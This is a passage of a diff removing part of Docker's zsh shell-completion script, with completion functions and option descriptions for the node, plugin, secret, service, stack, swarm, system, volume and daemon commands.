- _arguments $(__docker_arguments) \ - $opts_help \ - "($help -a --all)"{-a,--all}"[Display all instances]" \ - "($help)*"{-f=,--filter=}"[Provide filter values]:filter:->filter-options" \ - "($help)--no-resolve[Do not map IDs to Names]" \ - "($help)--no-trunc[Do not truncate output]" \ - "($help -)*:node:__docker_complete_nodes" && ret=0 - case $state in - (filter-options) - __docker_node_complete_ps_filters && ret=0 - ;; - esac - ;; - (update) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)--availability=[Availability of the node]:availability:(active pause drain)" \ - "($help)*--label-add=[Add or update a node label]:key=value: " \ - "($help)*--label-rm=[Remove a node label if exists]:label: " \ - "($help)--role=[Role of the node]:role:(manager worker)" \ - "($help -)1:node:__docker_complete_nodes" && ret=0 - ;; - (help) - _arguments $(__docker_arguments) ":subcommand:__docker_node_commands" && ret=0 - ;; - esac - - return ret -} - -# EO node - -# BO plugin - -__docker_complete_plugins() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - local line s - declare -a lines plugins - - lines=(${(f)${:-"$(_call_program commands docker $docker_options plugin ls)"$'\n'}}) - - # Parse header line to find columns - local i=1 j=1 k header=${lines[1]} - declare -A begin end - while (( j < ${#header} - 1 )); do - i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 )) - j=$(( i + ${${header[$i,-1]}[(i) ]} - 1 )) - k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 )) - begin[${header[$i,$((j-1))]}]=$i - end[${header[$i,$((j-1))]}]=$k - done - end[${header[$i,$((j-1))]}]=-1 - lines=(${lines[2,-1]}) - - # Name - for line in $lines; do - s="${line[${begin[NAME]},${end[NAME]}]%% ##}" - s="$s:${(l:7:: :::)${${line[${begin[TAG]},${end[TAG]}]}%% ##}}" - plugins=($plugins $s) - done - - _describe -t plugins-list "plugins" plugins "$@" && ret=0 - return ret -} - -__docker_plugin_commands() { - local -a _docker_plugin_subcommands - _docker_plugin_subcommands=( - "disable:Disable a 
plugin" - "enable:Enable a plugin" - "inspect:Return low-level information about a plugin" - "install:Install a plugin" - "ls:List plugins" - "push:Push a plugin" - "rm:Remove a plugin" - "set:Change settings for a plugin" - ) - _describe -t docker-plugin-commands "docker plugin command" _docker_plugin_subcommands -} - -__docker_plugin_subcommand() { - local -a _command_args opts_help - local expl help="--help" - integer ret=1 - - opts_help=("(: -)--help[Print usage]") - - case "$words[1]" in - (disable|enable|inspect|ls|push|rm) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -)1:plugin:__docker_complete_plugins" && ret=0 - ;; - (install) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)--alias=[Local name for plugin]:alias: " \ - "($help -)1:plugin:__docker_complete_plugins" && ret=0 - ;; - (set) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -)1:plugin:__docker_complete_plugins" \ - "($help-)*:key=value: " && ret=0 - ;; - (help) - _arguments $(__docker_arguments) ":subcommand:__docker_plugin_commands" && ret=0 - ;; - esac - - return ret -} - -# EO plugin - -# BO secret - -__docker_secrets() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - local line s - declare -a lines secrets - - type=$1; shift - - lines=(${(f)${:-"$(_call_program commands docker $docker_options secret ls)"$'\n'}}) - - # Parse header line to find columns - local i=1 j=1 k header=${lines[1]} - declare -A begin end - while (( j < ${#header} - 1 )); do - i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 )) - j=$(( i + ${${header[$i,-1]}[(i) ]} - 1 )) - k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 )) - begin[${header[$i,$((j-1))]}]=$i - end[${header[$i,$((j-1))]}]=$k - done - end[${header[$i,$((j-1))]}]=-1 - lines=(${lines[2,-1]}) - - # ID - if [[ $type = (ids|all) ]]; then - for line in $lines; do - s="${line[${begin[ID]},${end[ID]}]%% ##}" - secrets=($secrets $s) - done - fi - - # Names - if [[ $type = (names|all) ]]; then - for line in $lines; do - 
s="${line[${begin[NAME]},${end[NAME]}]%% ##}" - secrets=($secrets $s) - done - fi - - _describe -t secrets-list "secrets" secrets "$@" && ret=0 - return ret -} - -__docker_complete_secrets() { - [[ $PREFIX = -* ]] && return 1 - __docker_secrets all "$@" -} - -__docker_secret_commands() { - local -a _docker_secret_subcommands - _docker_secret_subcommands=( - "create:Create a secret using stdin as content" - "inspect:Display detailed information on one or more secrets" - "ls:List secrets" - "rm:Remove one or more secrets" - ) - _describe -t docker-secret-commands "docker secret command" _docker_secret_subcommands -} - -__docker_secret_subcommand() { - local -a _command_args opts_help - local expl help="--help" - integer ret=1 - - opts_help=("(: -)--help[Print usage]") - - case "$words[1]" in - (create) - _arguments $(__docker_arguments) -A '-*' \ - $opts_help \ - "($help)*"{-l=,--label=}"[Secret labels]:label: " \ - "($help -):secret: " && ret=0 - ;; - (inspect) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -f --format)"{-f=,--format=}"[Format the output using the given Go template]:template: " \ - "($help -)*:secret:__docker_complete_secrets" && ret=0 - ;; - (ls|list) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -q --quiet)"{-q,--quiet}"[Only display IDs]" && ret=0 - ;; - (rm|remove) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -)*:secret:__docker_complete_secrets" && ret=0 - ;; - (help) - _arguments $(__docker_arguments) ":subcommand:__docker_secret_commands" && ret=0 - ;; - esac - - return ret -} - -# EO secret - -# BO service - -__docker_service_complete_ls_filters() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - - if compset -P '*='; then - case "${${words[-1]%=*}#*=}" in - (id) - __docker_complete_services_ids && ret=0 - ;; - (name) - __docker_complete_services_names && ret=0 - ;; - *) - _message 'value' && ret=0 - ;; - esac - else - opts=('id' 'label' 'name') - _describe -t filter-opts "filter options" 
opts -qS "=" && ret=0 - fi - - return ret -} - -__docker_service_complete_ps_filters() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - - if compset -P '*='; then - case "${${words[-1]%=*}#*=}" in - (desired-state) - state_opts=('accepted' 'running') - _describe -t state-opts "desired state options" state_opts && ret=0 - ;; - *) - _message 'value' && ret=0 - ;; - esac - else - opts=('desired-state' 'id' 'label' 'name') - _describe -t filter-opts "filter options" opts -qS "=" && ret=0 - fi - - return ret -} - -__docker_services() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - local line s - declare -a lines services - - type=$1; shift - - lines=(${(f)${:-"$(_call_program commands docker $docker_options service ls)"$'\n'}}) - - # Parse header line to find columns - local i=1 j=1 k header=${lines[1]} - declare -A begin end - while (( j < ${#header} - 1 )); do - i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 )) - j=$(( i + ${${header[$i,-1]}[(i) ]} - 1 )) - k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 )) - begin[${header[$i,$((j-1))]}]=$i - end[${header[$i,$((j-1))]}]=$k - done - end[${header[$i,$((j-1))]}]=-1 - lines=(${lines[2,-1]}) - - # Service ID - if [[ $type = (ids|all) ]]; then - for line in $lines; do - s="${line[${begin[ID]},${end[ID]}]%% ##}" - s="$s:${(l:7:: :::)${${line[${begin[IMAGE]},${end[IMAGE]}]}%% ##}}" - services=($services $s) - done - fi - - # Names - if [[ $type = (names|all) ]]; then - for line in $lines; do - s="${line[${begin[NAME]},${end[NAME]}]%% ##}" - s="$s:${(l:7:: :::)${${line[${begin[IMAGE]},${end[IMAGE]}]}%% ##}}" - services=($services $s) - done - fi - - _describe -t services-list "services" services "$@" && ret=0 - return ret -} - -__docker_complete_services() { - [[ $PREFIX = -* ]] && return 1 - __docker_services all "$@" -} - -__docker_complete_services_ids() { - [[ $PREFIX = -* ]] && return 1 - __docker_services ids "$@" -} - -__docker_complete_services_names() { - [[ $PREFIX = -* ]] && return 1 - __docker_services names "$@" 
-} - -__docker_service_commands() { - local -a _docker_service_subcommands - _docker_service_subcommands=( - "create:Create a new service" - "inspect:Display detailed information on one or more services" - "ls:List services" - "rm:Remove one or more services" - "scale:Scale one or multiple replicated services" - "ps:List the tasks of a service" - "update:Update a service" - ) - _describe -t docker-service-commands "docker service command" _docker_service_subcommands -} - -__docker_service_subcommand() { - local -a _command_args opts_help opts_create_update - local expl help="--help" - integer ret=1 - - opts_help=("(: -)--help[Print usage]") - opts_create_update=( - "($help)*--constraint=[Placement constraints]:constraint: " - "($help)--endpoint-mode=[Placement constraints]:mode:(dnsrr vip)" - "($help)*"{-e=,--env=}"[Set environment variables]:env: " - "($help)--health-cmd=[Command to run to check health]:command: " - "($help)--health-interval=[Time between running the check]:time: " - "($help)--health-retries=[Consecutive failures needed to report unhealthy]:retries:(1 2 3 4 5)" - "($help)--health-timeout=[Maximum time to allow one check to run]:time: " - "($help)--hostname=[Service container hostname]:hostname: " \ - "($help)*--label=[Service labels]:label: " - "($help)--limit-cpu=[Limit CPUs]:value: " - "($help)--limit-memory=[Limit Memory]:value: " - "($help)--log-driver=[Logging driver for service]:logging driver:__docker_complete_log_drivers" - "($help)*--log-opt=[Logging driver options]:log driver options:__docker_complete_log_options" - "($help)*--mount=[Attach a filesystem mount to the service]:mount: " - "($help)*--network=[Network attachments]:network: " - "($help)--no-healthcheck[Disable any container-specified HEALTHCHECK]" - "($help)*"{-p=,--publish=}"[Publish a port as a node port]:port: " - "($help)--replicas=[Number of tasks]:replicas: " - "($help)--reserve-cpu=[Reserve CPUs]:value: " - "($help)--reserve-memory=[Reserve Memory]:value: " - 
"($help)--restart-condition=[Restart when condition is met]:mode:(any none on-failure)" - "($help)--restart-delay=[Delay between restart attempts]:delay: " - "($help)--restart-max-attempts=[Maximum number of restarts before giving up]:max-attempts: " - "($help)--restart-window=[Window used to evaluate the restart policy]:window: " - "($help)*--secret=[Specify secrets to expose to the service]:secret:__docker_complete_secrets" - "($help)--stop-grace-period=[Time to wait before force killing a container]:grace period: " - "($help -t --tty)"{-t,--tty}"[Allocate a pseudo-TTY]" - "($help)--update-delay=[Delay between updates]:delay: " - "($help)--update-failure-action=[Action on update failure]:mode:(pause continue)" - "($help)--update-max-failure-ratio=[Failure rate to tolerate during an update]:fraction: " - "($help)--update-monitor=[Duration after each task update to monitor for failure]:window: " - "($help)--update-parallelism=[Maximum number of tasks updated simultaneously]:number: " - "($help -u --user)"{-u=,--user=}"[Username or UID]:user:_users" - "($help)--with-registry-auth[Send registry authentication details to swarm agents]" - "($help -w --workdir)"{-w=,--workdir=}"[Working directory inside the container]:directory:_directories" - ) - - case "$words[1]" in - (create) - _arguments $(__docker_arguments) \ - $opts_help \ - $opts_create_update \ - "($help)*--container-label=[Container labels]:label: " \ - "($help)*--dns=[Set custom DNS servers]:DNS: " \ - "($help)*--dns-option=[Set DNS options]:DNS option: " \ - "($help)*--dns-search=[Set custom DNS search domains]:DNS search: " \ - "($help)*--env-file=[Read environment variables from a file]:environment file:_files" \ - "($help)--mode=[Service Mode]:mode:(global replicated)" \ - "($help)--name=[Service name]:name: " \ - "($help)*--publish=[Publish a port]:port: " \ - "($help -): :__docker_complete_images" \ - "($help -):command: _command_names -e" \ - "($help -)*::arguments: _normal" && ret=0 - ;; - (inspect) 
- _arguments $(__docker_arguments) \ - $opts_help \ - "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \ - "($help)--pretty[Print the information in a human friendly format]" \ - "($help -)*:service:__docker_complete_services" && ret=0 - ;; - (ls|list) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)*"{-f=,--filter=}"[Filter output based on conditions provided]:filter:->filter-options" \ - "($help -q --quiet)"{-q,--quiet}"[Only display IDs]" && ret=0 - case $state in - (filter-options) - __docker_service_complete_ls_filters && ret=0 - ;; - esac - ;; - (rm|remove) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -)*:service:__docker_complete_services" && ret=0 - ;; - (scale) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -)*:service:->values" && ret=0 - case $state in - (values) - if compset -P '*='; then - _message 'replicas' && ret=0 - else - __docker_complete_services -qS "=" - fi - ;; - esac - ;; - (ps) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)*"{-f=,--filter=}"[Provide filter values]:filter:->filter-options" \ - "($help)--no-resolve[Do not map IDs to Names]" \ - "($help)--no-trunc[Do not truncate output]" \ - "($help -q --quiet)"{-q,--quiet}"[Only display task IDs]" \ - "($help -)1:service:__docker_complete_services" && ret=0 - case $state in - (filter-options) - __docker_service_complete_ps_filters && ret=0 - ;; - esac - ;; - (update) - _arguments $(__docker_arguments) \ - $opts_help \ - $opts_create_update \ - "($help)--arg=[Service command args]:arguments: _normal" \ - "($help)*--container-label-add=[Add or update container labels]:label: " \ - "($help)*--container-label-rm=[Remove a container label by its key]:label: " \ - "($help)*--dns-add=[Add or update custom DNS servers]:DNS: " \ - "($help)*--dns-rm=[Remove custom DNS servers]:DNS: " \ - "($help)*--dns-option-add=[Add or update DNS options]:DNS option: " \ - "($help)*--dns-option-rm=[Remove 
DNS options]:DNS option: " \ - "($help)*--dns-search-add=[Add or update custom DNS search domains]:DNS search: " \ - "($help)*--dns-search-rm=[Remove DNS search domains]:DNS search: " \ - "($help)--force[Force update]" \ - "($help)*--group-add=[Add additional supplementary user groups to the container]:group:_groups" \ - "($help)*--group-rm=[Remove previously added supplementary user groups from the container]:group:_groups" \ - "($help)--image=[Service image tag]:image:__docker_complete_repositories" \ - "($help)*--publish-add=[Add or update a port]:port: " \ - "($help)*--publish-rm=[Remove a port(target-port mandatory)]:port: " \ - "($help)--rollback[Rollback to previous specification]" \ - "($help -)1:service:__docker_complete_services" && ret=0 - ;; - (help) - _arguments $(__docker_arguments) ":subcommand:__docker_service_commands" && ret=0 - ;; - esac - - return ret -} - -# EO service - -# BO stack - -__docker_stack_complete_ps_filters() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - - if compset -P '*='; then - case "${${words[-1]%=*}#*=}" in - (desired-state) - state_opts=('accepted' 'running') - _describe -t state-opts "desired state options" state_opts && ret=0 - ;; - *) - _message 'value' && ret=0 - ;; - esac - else - opts=('desired-state' 'id' 'name') - _describe -t filter-opts "filter options" opts -qS "=" && ret=0 - fi - - return ret -} - -__docker_stack_complete_services_filters() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - - if compset -P '*='; then - case "${${words[-1]%=*}#*=}" in - *) - _message 'value' && ret=0 - ;; - esac - else - opts=('id' 'label' 'name') - _describe -t filter-opts "filter options" opts -qS "=" && ret=0 - fi - - return ret -} - -__docker_stacks() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - local line s - declare -a lines stacks - - lines=(${(f)${:-"$(_call_program commands docker $docker_options stack ls)"$'\n'}}) - - # Parse header line to find columns - local i=1 j=1 k header=${lines[1]} - declare -A 
begin end - while (( j < ${#header} - 1 )); do - i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 )) - j=$(( i + ${${header[$i,-1]}[(i) ]} - 1 )) - k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 )) - begin[${header[$i,$((j-1))]}]=$i - end[${header[$i,$((j-1))]}]=$k - done - end[${header[$i,$((j-1))]}]=-1 - lines=(${lines[2,-1]}) - - # Service ID - for line in $lines; do - s="${line[${begin[ID]},${end[ID]}]%% ##}" - stacks=($stacks $s) - done - - _describe -t stacks-list "stacks" stacks "$@" && ret=0 - return ret -} - -__docker_complete_stacks() { - [[ $PREFIX = -* ]] && return 1 - __docker_stacks "$@" -} - -__docker_stack_commands() { - local -a _docker_stack_subcommands - _docker_stack_subcommands=( - "deploy:Deploy a new stack or update an existing stack" - "ls:List stacks" - "ps:List the tasks in the stack" - "rm:Remove the stack" - "services:List the services in the stack" - ) - _describe -t docker-stack-commands "docker stack command" _docker_stack_subcommands -} - -__docker_stack_subcommand() { - local -a _command_args opts_help - local expl help="--help" - integer ret=1 - - opts_help=("(: -)--help[Print usage]") - - case "$words[1]" in - (deploy|up) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)--bundle-file=[Path to a Distributed Application Bundle file]:dab:_files -g \"*.dab\"" \ - "($help -c --compose-file)"{-c=,--compose-file=}"[Path to a Compose file]:compose file:_files -g \"*.(yml|yaml)\"" \ - "($help)--with-registry-auth[Send registry authentication details to Swarm agents]" \ - "($help -):stack:__docker_complete_stacks" && ret=0 - ;; - (ls|list) - _arguments $(__docker_arguments) \ - $opts_help && ret=0 - ;; - (ps) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -a --all)"{-a,--all}"[Display all tasks]" \ - "($help)*"{-f=,--filter=}"[Filter output based on conditions provided]:filter:__docker_stack_complete_ps_filters" \ - "($help)--no-resolve[Do not map IDs to Names]" \ - "($help)--no-trunc[Do not truncate output]" \ - "($help 
-):stack:__docker_complete_stacks" && ret=0 - ;; - (rm|remove|down) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -):stack:__docker_complete_stacks" && ret=0 - ;; - (services) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)*"{-f=,--filter=}"[Filter output based on conditions provided]:filter:__docker_stack_complete_services_filters" \ - "($help -q --quiet)"{-q,--quiet}"[Only display IDs]" \ - "($help -):stack:__docker_complete_stacks" && ret=0 - ;; - (help) - _arguments $(__docker_arguments) ":subcommand:__docker_stack_commands" && ret=0 - ;; - esac - - return ret -} - -# EO stack - -# BO swarm - -__docker_swarm_commands() { - local -a _docker_swarm_subcommands - _docker_swarm_subcommands=( - "init:Initialize a swarm" - "join:Join a swarm as a node and/or manager" - "join-token:Manage join tokens" - "leave:Leave a swarm" - "update:Update the swarm" - ) - _describe -t docker-swarm-commands "docker swarm command" _docker_swarm_subcommands -} - -__docker_swarm_subcommand() { - local -a _command_args opts_help - local expl help="--help" - integer ret=1 - - opts_help=("(: -)--help[Print usage]") - - case "$words[1]" in - (init) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)--advertise-addr[Advertised address]:ip\:port: " \ - "($help)*--external-ca=[Specifications of one or more certificate signing endpoints]:endpoint: " \ - "($help)--force-new-cluster[Force create a new cluster from current state]" \ - "($help)--listen-addr=[Listen address]:ip\:port: " \ - "($help)--max-snapshots[Number of additional Raft snapshots to retain]" \ - "($help)--snapshot-interval[Number of log entries between Raft snapshots]" \ - "($help)--task-history-limit=[Task history retention limit]:limit: " && ret=0 - ;; - (join) - _arguments $(__docker_arguments) -A '-*' \ - $opts_help \ - "($help)--advertise-addr=[Advertised address]:ip\:port: " \ - "($help)--availability=[Availability of the node]:availability:(active drain pause)" \ - 
"($help)--listen-addr=[Listen address]:ip\:port: " \ - "($help)--token=[Token for entry into the swarm]:secret: " \ - "($help -):host\:port: " && ret=0 - ;; - (join-token) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -q --quiet)"{-q,--quiet}"[Only display token]" \ - "($help)--rotate[Rotate join token]" \ - "($help -):role:(manager worker)" && ret=0 - ;; - (leave) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -f --force)"{-f,--force}"[Force this node to leave the swarm, ignoring warnings]" && ret=0 - ;; - (update) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)--cert-expiry=[Validity period for node certificates]:duration: " \ - "($help)*--external-ca=[Specifications of one or more certificate signing endpoints]:endpoint: " \ - "($help)--dispatcher-heartbeat=[Dispatcher heartbeat period]:duration: " \ - "($help)--max-snapshots[Number of additional Raft snapshots to retain]" \ - "($help)--snapshot-interval[Number of log entries between Raft snapshots]" \ - "($help)--task-history-limit=[Task history retention limit]:limit: " && ret=0 - ;; - (help) - _arguments $(__docker_arguments) ":subcommand:__docker_network_commands" && ret=0 - ;; - esac - - return ret -} - -# EO swarm - -# BO system - -__docker_system_commands() { - local -a _docker_system_subcommands - _docker_system_subcommands=( - "df:Show docker filesystem usage" - "events:Get real time events from the server" - "info:Display system-wide information" - "prune:Remove unused data" - ) - _describe -t docker-system-commands "docker system command" _docker_system_subcommands -} - -__docker_system_subcommand() { - local -a _command_args opts_help - local expl help="--help" - integer ret=1 - - opts_help=("(: -)--help[Print usage]") - - case "$words[1]" in - (df) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -v --verbose)"{-v,--verbose}"[Show detailed information on space usage]" && ret=0 - ;; - (events) - _arguments $(__docker_arguments) \ - $opts_help 
\ - "($help)*"{-f=,--filter=}"[Filter values]:filter:__docker_complete_events_filter" \ - "($help)--since=[Events created since this timestamp]:timestamp: " \ - "($help)--until=[Events created until this timestamp]:timestamp: " \ - "($help)--format=[Format the output using the given go template]:template: " && ret=0 - ;; - (info) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " && ret=0 - ;; - (prune) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -a --all)"{-a,--all}"[Remove all unused data, not just dangling ones]" \ - "($help)*--filter=[Filter values]:filter:__docker_complete_prune_filters" \ - "($help -f --force)"{-f,--force}"[Do not prompt for confirmation]" && ret=0 - ;; - (help) - _arguments $(__docker_arguments) ":subcommand:__docker_volume_commands" && ret=0 - ;; - esac - - return ret -} - -# EO system - -# BO volume - -__docker_volume_complete_ls_filters() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - - if compset -P '*='; then - case "${${words[-1]%=*}#*=}" in - (dangling) - dangling_opts=('true' 'false') - _describe -t dangling-filter-opts "Dangling Filter Options" dangling_opts && ret=0 - ;; - (driver) - __docker_complete_info_plugins Volume && ret=0 - ;; - (name) - __docker_complete_volumes && ret=0 - ;; - *) - _message 'value' && ret=0 - ;; - esac - else - opts=('dangling' 'driver' 'label' 'name') - _describe -t filter-opts "Filter Options" opts -qS "=" && ret=0 - fi - - return ret -} - -__docker_complete_volumes() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - declare -a lines volumes - - lines=(${(f)${:-"$(_call_program commands docker $docker_options volume ls)"$'\n'}}) - - # Parse header line to find columns - local i=1 j=1 k header=${lines[1]} - declare -A begin end - while (( j < ${#header} - 1 )); do - i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 )) - j=$(( i + ${${header[$i,-1]}[(i) ]} - 1 )) - k=$(( j + 
${${header[$j,-1]}[(i)[^ ]]} - 2 )) - begin[${header[$i,$((j-1))]}]=$i - end[${header[$i,$((j-1))]}]=$k - done - end[${header[$i,$((j-1))]}]=-1 - lines=(${lines[2,-1]}) - - # Names - local line s - for line in $lines; do - s="${line[${begin[VOLUME NAME]},${end[VOLUME NAME]}]%% ##}" - s="$s:${(l:7:: :::)${${line[${begin[DRIVER]},${end[DRIVER]}]}%% ##}}" - volumes=($volumes $s) - done - - _describe -t volumes-list "volumes" volumes && ret=0 - return ret -} - -__docker_volume_commands() { - local -a _docker_volume_subcommands - _docker_volume_subcommands=( - "create:Create a volume" - "inspect:Display detailed information on one or more volumes" - "ls:List volumes" - "prune:Remove all unused volumes" - "rm:Remove one or more volumes" - ) - _describe -t docker-volume-commands "docker volume command" _docker_volume_subcommands -} - -__docker_volume_subcommand() { - local -a _command_args opts_help - local expl help="--help" - integer ret=1 - - opts_help=("(: -)--help[Print usage]") - - case "$words[1]" in - (create) - _arguments $(__docker_arguments) -A '-*' \ - $opts_help \ - "($help -d --driver)"{-d=,--driver=}"[Volume driver name]:Driver name:(local)" \ - "($help)*--label=[Set metadata for a volume]:label=value: " \ - "($help)*"{-o=,--opt=}"[Driver specific options]:Driver option: " \ - "($help -)1:Volume name: " && ret=0 - ;; - (inspect) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \ - "($help -)1:volume:__docker_complete_volumes" && ret=0 - ;; - (ls) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)*"{-f=,--filter=}"[Provide filter values]:filter:->filter-options" \ - "($help)--format=[Pretty-print volumes using a Go template]:template: " \ - "($help -q --quiet)"{-q,--quiet}"[Only display volume names]" && ret=0 - case $state in - (filter-options) - __docker_volume_complete_ls_filters && ret=0 - ;; - esac - ;; - (prune) - _arguments 
$(__docker_arguments) \ - $opts_help \ - "($help -f --force)"{-f,--force}"[Do not prompt for confirmation]" && ret=0 - ;; - (rm) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -f --force)"{-f,--force}"[Force the removal of one or more volumes]" \ - "($help -):volume:__docker_complete_volumes" && ret=0 - ;; - (help) - _arguments $(__docker_arguments) ":subcommand:__docker_volume_commands" && ret=0 - ;; - esac - - return ret -} - -# EO volume - -__docker_caching_policy() { - oldp=( "$1"(Nmh+1) ) # 1 hour - (( $#oldp )) -} - -__docker_commands() { - local cache_policy - - zstyle -s ":completion:${curcontext}:" cache-policy cache_policy - if [[ -z "$cache_policy" ]]; then - zstyle ":completion:${curcontext}:" cache-policy __docker_caching_policy - fi - - if ( [[ ${+_docker_subcommands} -eq 0 ]] || _cache_invalid docker_subcommands) \ - && ! _retrieve_cache docker_subcommands; - then - local -a lines - lines=(${(f)"$(_call_program commands docker 2>&1)"}) - _docker_subcommands=(${${${(M)${lines[$((${lines[(i)*Commands:]} + 1)),-1]}:# *}## #}/ ##/:}) - _docker_subcommands=($_docker_subcommands 'daemon:Enable daemon mode' 'help:Show help for a command') - (( $#_docker_subcommands > 2 )) && _store_cache docker_subcommands _docker_subcommands - fi - _describe -t docker-commands "docker command" _docker_subcommands -} - -__docker_subcommand() { - local -a _command_args opts_help - local expl help="--help" - integer ret=1 - - opts_help=("(: -)--help[Print usage]") - - case "$words[1]" in - (attach|commit|cp|create|diff|exec|export|kill|logs|pause|unpause|port|rename|restart|rm|run|start|stats|stop|top|update|wait) - __docker_container_subcommand && ret=0 - ;; - (build|history|import|load|pull|push|save|tag) - __docker_image_subcommand && ret=0 - ;; - (container) - local curcontext="$curcontext" state - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -): :->command" \ - "($help -)*:: :->option-or-argument" && ret=0 - - case $state in - (command) - 
__docker_container_commands && ret=0 - ;; - (option-or-argument) - curcontext=${curcontext%:*:*}:docker-${words[-1]}: - __docker_container_subcommand && ret=0 - ;; - esac - ;; - (daemon) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)*--add-runtime=[Register an additional OCI compatible runtime]:runtime:__docker_complete_runtimes" \ - "($help)--api-cors-header=[CORS headers in the Engine API]:CORS headers: " \ - "($help)*--authorization-plugin=[Authorization plugins to load]" \ - "($help -b --bridge)"{-b=,--bridge=}"[Attach containers to a network bridge]:bridge:_net_interfaces" \ - "($help)--bip=[Network bridge IP]:IP address: " \ - "($help)--cgroup-parent=[Parent cgroup for all containers]:cgroup: " \ - "($help)--cluster-advertise=[Address or interface name to advertise]:Instance to advertise (host\:port): " \ - "($help)--cluster-store=[URL of the distributed storage backend]:Cluster Store:->cluster-store" \ - "($help)*--cluster-store-opt=[Cluster store options]:Cluster options:->cluster-store-options" \ - "($help)--config-file=[Path to daemon configuration file]:Config File:_files" \ - "($help)--containerd=[Path to containerd socket]:socket:_files -g \"*.sock\"" \ - "($help -D --debug)"{-D,--debug}"[Enable debug mode]" \ - "($help)--default-gateway[Container default gateway IPv4 address]:IPv4 address: " \ - "($help)--default-gateway-v6[Container default gateway IPv6 address]:IPv6 address: " \ - "($help)*--default-ulimit=[Default ulimits for containers]:ulimit: " \ - "($help)--disable-legacy-registry[Disable contacting legacy registries]" \ - "($help)*--dns=[DNS server to use]:DNS: " \ - "($help)*--dns-opt=[DNS options to use]:DNS option: " \ - "($help)*--dns-search=[DNS search domains to use]:DNS search: " \ - "($help)*--exec-opt=[Runtime execution options]:runtime execution options: " \ - "($help)--exec-root=[Root directory for execution state files]:path:_directories" \ - "($help)--experimental[Enable experimental features]" \ - 
"($help)--fixed-cidr=[IPv4 subnet for fixed IPs]:IPv4 subnet: " \ - "($help)--fixed-cidr-v6=[IPv6 subnet for fixed IPs]:IPv6 subnet: " \ - "($help -G --group)"{-G=,--group=}"[Group for the unix socket]:group:_groups" \ - "($help -g --graph)"{-g=,--graph=}"[Root of the Docker runtime]:path:_directories" \ - "($help -H --host)"{-H=,--host=}"[tcp://host:port to bind/connect to]:host: " \ - "($help)--icc[Enable inter-container communication]" \ - "($help)--init[Run an init inside containers to forward signals and reap processes]" \ - "($help)--init-path=[Path to the docker-init binary]:docker-init binary:_files" \ - "($help)*--insecure-registry=[Enable insecure registry communication]:registry: " \ - "($help)--ip=[Default IP when binding container ports]" \ - "($help)--ip-forward[Enable net.ipv4.ip_forward]" \ - "($help)--ip-masq[Enable IP masquerading]" \ - "($help)--iptables[Enable addition of iptables rules]" \ - "($help)--ipv6[Enable IPv6 networking]" \ - "($help -l --log-level)"{-l=,--log-level=}"[Logging level]:level:(debug info warn error fatal)" \ - "($help)*--label=[Key=value labels]:label: " \ - "($help)--live-restore[Enable live restore of docker when containers are still running]" \ - "($help)--log-driver=[Default driver for container logs]:logging driver:__docker_complete_log_drivers" \ - "($help)*--log-opt=[Default log driver options for containers]:log driver options:__docker_complete_log_options" \ - "($help)--max-concurrent-downloads[Set the max concurrent downloads for each pull]" \ - "($help)--max-concurrent-uploads[Set the max concurrent uploads for each push]" \ - "($help)--mtu=[Network MTU]:mtu:(0 576 1420 1500 9000)" \ - "($help)--oom-score-adjust=[Set the oom_score_adj for the daemon]:oom-score:(-500)" \ - "($help -p --pidfile)"{-p=,--pidfile=}"[Path to use for daemon PID file]:PID file:_files" \ - "($help)--raw-logs[Full timestamps without ANSI coloring]" \ - "($help)*--registry-mirror=[Preferred Docker registry mirror]:registry mirror: " \ - 
